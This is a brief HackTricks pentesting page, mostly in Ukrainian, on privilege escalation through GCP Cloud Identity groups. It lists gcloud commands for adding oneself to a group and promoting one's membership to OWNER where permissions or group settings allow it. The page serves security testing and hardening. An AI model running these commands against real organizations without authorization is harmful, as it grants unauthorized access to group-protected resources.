GCP - Cloudidentity Privesc

Support HackTricks

Cloudidentity

Для отримання додаткової інформації про сервіс cloudidentity, перегляньте цю сторінку:

GCP - IAM, Principals & Org Policies Enum

Додайте себе до групи

Якщо у вашого користувача достатньо прав або група неправильно налаштована, він може стати членом нової групи:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Змінити членство в групі

Якщо у вашого користувача достатньо прав або група неправильно налаштована, він може зробити себе ВЛАСНИКОМ групи, членом якої є:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Підтримайте HackTricks

Last updated